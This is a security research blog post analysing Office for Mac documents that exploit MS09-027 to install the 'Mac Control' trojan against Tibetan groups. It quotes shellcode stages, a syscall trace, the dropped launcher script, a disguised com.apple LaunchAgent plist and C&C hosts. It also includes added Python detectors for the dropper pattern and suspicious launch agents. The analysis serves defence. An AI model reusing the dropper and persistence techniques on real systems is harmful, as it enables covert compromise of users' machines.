MS Office exploit that targets MacOS X seen in the wild - delivers "Mac Control" RAT

March 27, 2012 | Jaime Blasco

Continuing our research on the Tibet attacks, we have found more Mac trojans and some interesting MS Office files that deliver them. The group behind these attacks is the same one we have been tracking for a while:

- http://labs.alienvault.com/labs/index.php/2012/alienvault-research-used-as-lure-in-targeted-attacks/ [no longer available] AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

The doc files seem to exploit MS09-027 and target Microsoft Office for Mac. This is one of the few times we have seen a malicious Office file used to deliver malware on Mac OS X.

http://technet.microsoft.com/en-us/security/bulletin/MS09-027

A remote code execution vulnerability exists in the way that Microsoft Office Word handles a specially crafted Word file that includes a malformed record. An attacker who successfully exploits this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

When the victim opens the malicious Word file using Office for Mac, the shellcode writes the malicious payload to disk and executes it, and then opens a benign Office file with the following content:

The first stage copies the payload to the __IMPORT section of dyld using memcpy:

push dword 0x1be        # payload size
push edx
push dword 0x8fe6f318
push dword 0x8fe6f318   # dyld __IMPORT (rwx)
mov ebx,0x8fe2e130      # memcpy
jmp ebx

The second stage writes necessary files to /tmp/ (bash file, benign doc file, binary) and then executes the bash script (/tmp/launch-hs):

fstat(0x2, 0xBFFF4CD0, 0x200)
...
fstat(0x24, 0xBFFF4CD0, 0x200)
lseek(0x24, 0x6600, 0x0)   # file offset in the doc file
open("/tmp/launch-hs\0", 0x602, 0x1FF)
open("/tmp/launch-hse\0", 0x602, 0x1FF)
open("/tmp/file.doc\0", 0x602, 0x1FF)
read(0x24, "#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0", 0x32)
write(0x26, "#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0", 0x32)
...
close(0x28)
vfork()
execve(0x28, 0xBFFF4B80, 0x0)

Bash file (/tmp/launch-hs):

#!/bin/sh
/tmp/launch-hse &
open /tmp/file.doc &
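The trace above is the whole dropper pattern in a dozen lines: a document-handling process creates files under /tmp with O_CREAT (the 0x602 flags) and mode 0777 (0x1FF), writes a shell script into one of them, then calls execve. The following script, added here as an example and not code from the original post, parses dtruss-style trace lines and flags exactly that sequence. The sample input is a constructed transcription of the trace shown above with straight quotes; since the post shows no syscall return values, file descriptors are not tracked, and the rule fires on "executable created in /tmp, then exec" regardless of which fd was exec'd.

```python
import re

O_CREAT = 0x0200      # macOS <sys/fcntl.h> value; 0x602 in the trace is O_RDWR|O_CREAT|O_TRUNC
EXEC_BITS = 0o111     # any execute bit; 0x1FF in the trace is mode 0777

# Constructed sample: the syscall trace from the post, one call per line, straight quotes.
SAMPLE_TRACE = r'''
fstat(0x24, 0xBFFF4CD0, 0x200)
lseek(0x24, 0x6600, 0x0)
open("/tmp/launch-hs\0", 0x602, 0x1FF)
open("/tmp/launch-hse\0", 0x602, 0x1FF)
open("/tmp/file.doc\0", 0x602, 0x1FF)
read(0x24, "#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0", 0x32)
write(0x26, "#!/bin/sh\n/tmp/launch-hse &\nopen /tmp/file.doc &\n\n\0", 0x32)
close(0x28)
vfork()
execve(0x28, 0xBFFF4B80, 0x0)
'''

CALL_RE = re.compile(r'^\s*(\w+)\((.*)\)\s*$')
# one argument: a double-quoted C string (backslash escapes allowed) or a decimal/hex number
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|(0x[0-9A-Fa-f]+|\d+)')


def parse_call(line):
    """Return (syscall name, [args]) for one trace line, or None if it is not a call."""
    m = CALL_RE.match(line)
    if not m:
        return None
    name, raw = m.groups()
    args = []
    for am in ARG_RE.finditer(raw):
        if am.group(2) is not None:
            args.append(int(am.group(2), 0))
        else:
            # keep the C string readable: drop the trailing NUL escape, unescape newlines
            args.append(am.group(1).replace('\\0', '').replace('\\n', '\n'))
    return name, args


def find_tmp_dropper(trace):
    """Flag: file created under /tmp with exec bits set, followed later by execve/posix_spawn."""
    staged, findings = [], []
    for line in trace.strip().splitlines():
        parsed = parse_call(line)
        if parsed is None:
            continue
        name, args = parsed
        if name == 'open' and len(args) == 3 and isinstance(args[0], str):
            path, flags, mode = args
            if path.startswith('/tmp/') and flags & O_CREAT and mode & EXEC_BITS:
                staged.append(path)
        elif name in ('execve', 'posix_spawn') and staged:
            findings.append({'syscall': name, 'staged': list(staged)})
    return findings


def dropped_scripts(trace):
    """Return the bodies of shell scripts written out in the trace (write() of '#!' data)."""
    scripts = []
    for line in trace.strip().splitlines():
        parsed = parse_call(line)
        if parsed and parsed[0] == 'write':
            for arg in parsed[1]:
                if isinstance(arg, str) and arg.startswith('#!'):
                    scripts.append(arg)
    return scripts


if __name__ == '__main__':
    for f in find_tmp_dropper(SAMPLE_TRACE):
        print(f"{f['syscall']} after staging executables in /tmp: {f['staged']}")
    for s in dropped_scripts(SAMPLE_TRACE):
        print('dropped script:\n' + s)
```

The decoy /tmp/file.doc is flagged too because the shellcode creates it with mode 0777 as well; that is a property of this dropper rather than a parser quirk, and a stricter rule could additionally require that the staged path is later written with a "#!" or Mach-O header.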

A couple of doc files drop the previous Mac Trojan we reported last week.

The only difference is the .pslist used:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.docserver</string>
<key>Program</key>
<string> /Applications/Automator.app/Contents/MacOS/DockLight </string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
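Two things in that launch agent give it away without any signature: a com.apple.* label sitting in a user LaunchAgents directory, and a Program that lives inside Automator.app but is not Automator's own executable. The script below, added here as an example and not code from the original post, turns those observations into a small plist audit with plistlib. The first sample is a constructed transcription of the plist above (quotes straightened, the stray spaces inside <string> kept as the post shows them); the second is a hypothetical benign agent for contrast. The reason codes and the list of Apple-owned path prefixes are my own heuristics, not anything launchd defines.

```python
import os
import plistlib

# Constructed sample: the LaunchAgent plist from the post, quotes straightened.
SAMPLE_PLIST = b'''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.docserver</string>
<key>Program</key><string> /Applications/Automator.app/Contents/MacOS/DockLight </string>
<key>RunAtLoad</key><true/>
</dict>
</plist>
'''

# Constructed benign counterpart (hypothetical third-party updater agent).
BENIGN_PLIST = b'''<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/example-updater</string><string>--check</string></array>
<key>RunAtLoad</key><true/>
</dict>
</plist>
'''

# Heuristic: executables an Apple-labelled agent is expected to point at.
APPLE_PREFIXES = ('/System/', '/usr/bin/', '/usr/libexec/', '/usr/sbin/')


def program_of(d):
    """Program takes precedence over ProgramArguments[0]; surrounding whitespace is stripped."""
    prog = d.get('Program')
    if not prog:
        args = d.get('ProgramArguments') or []
        prog = args[0] if args else ''
    return str(prog).strip()


def audit_launch_agent(data, location='user'):
    """Return reason codes for one plist; an empty list means nothing suspicious."""
    d = plistlib.loads(data)          # handles XML and binary plists alike
    label = str(d.get('Label', ''))
    prog = program_of(d)
    reasons = []
    # Apple's own agents live under /System/Library; a com.apple.* label elsewhere is out of place
    if label.startswith('com.apple.') and location != 'system':
        reasons.append('apple-label-outside-system')
    # an Apple label pointing at a non-Apple executable
    if label.startswith('com.apple.') and not prog.startswith(APPLE_PREFIXES):
        reasons.append('apple-label-nonapple-program')
    # a binary parked inside another application's bundle under a different name
    if '.app/Contents/MacOS/' in prog:
        app = os.path.basename(prog.split('.app/Contents/MacOS/')[0])
        if os.path.basename(prog) != app:
            reasons.append('foreign-binary-in-app-bundle')
    if reasons and d.get('RunAtLoad'):
        reasons.append('runs-at-login')
    return reasons


def audit_directory(directory):
    """Audit every .plist in a LaunchAgents directory; 'location' is derived from the path."""
    location = 'system' if directory.startswith('/System/') else 'user'
    results = {}
    for name in sorted(os.listdir(directory)):
        if not name.endswith('.plist'):
            continue
        with open(os.path.join(directory, name), 'rb') as fh:
            try:
                results[name] = audit_launch_agent(fh.read(), location)
            except Exception as exc:        # malformed plist is itself worth a look
                results[name] = [f'unparseable: {exc}']
    return results


if __name__ == '__main__':
    print('sample:', audit_launch_agent(SAMPLE_PLIST))
    print('benign:', audit_launch_agent(BENIGN_PLIST))
    user_agents = os.path.expanduser('~/Library/LaunchAgents')
    if os.path.isdir(user_agents):
        for name, reasons in audit_directory(user_agents).items():
            if reasons:
                print(name, reasons)
```

Because plistlib autodetects the format, the same audit works on the binary plists that later tooling writes, and the whitespace stripping keeps a padded path like the one in this sample from slipping past a prefix check.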

The C&C server this time is:

- 2012.slyip.net : 173.255.160.234

173.255.160.128 - 173.255.160.255
Black Oak Computers Inc - New York - 75 Broad Street
New York, NY, US

The second trojan found is a new one that we have never seen before. We have found several versions compiled for different architectures (ppc, i386, ...). We have also found a version that contains paths to debugging symbols:

/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/Release/Foundation_Hello.build/Objects-normal/ppc/Foundation_Hello.o
/Developer/longgegeProject/Mac Control/MacControl V1.1.1/build/Foundation_Hello.build/Release/Foundation_Hello.build/Objects-normal/i386/Foundation_Hello.o

So the group seems to have a project called “longgege” and the actual trojan is named “MacControl” by them.

The trojan performs the following actions:

- Copies itself into /Library/launched
- Creates /Users/{User}/Library/LaunchAgents/com.apple.FolderActionxsl.pslist

This is how it maintains persistence: the trojan will be executed when the computer starts.

- It then reads the configuration parameters stored at the end of the binary file:
  - domain: freetibet2012.xicp.net
  - port: 80
- Establishes a connection to the host present in the configuration parameters.
- Sends some information about the victim: username, hostname, system version...
- The trojan will then wait for commands from the C&C.

The attackers can then send commands to the victim to open a remote shell, send files, receive files, delete files...

The C&C domain freetibet2012.xicp.net resolves to 114.249.207.194:

114.240.0.0 - 114.255.255.255
China Unicom Beijing province network
China Unicom

All the samples we have found, including the malicious doc files, have a 0/0 antivirus detection rate.

We will publish a technical analysis of the trojan capabilities and some tips to detect these threats. Stay tuned!

Thanks to Rubén Santamarta @reversemode for his help during the analysis.

 
Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.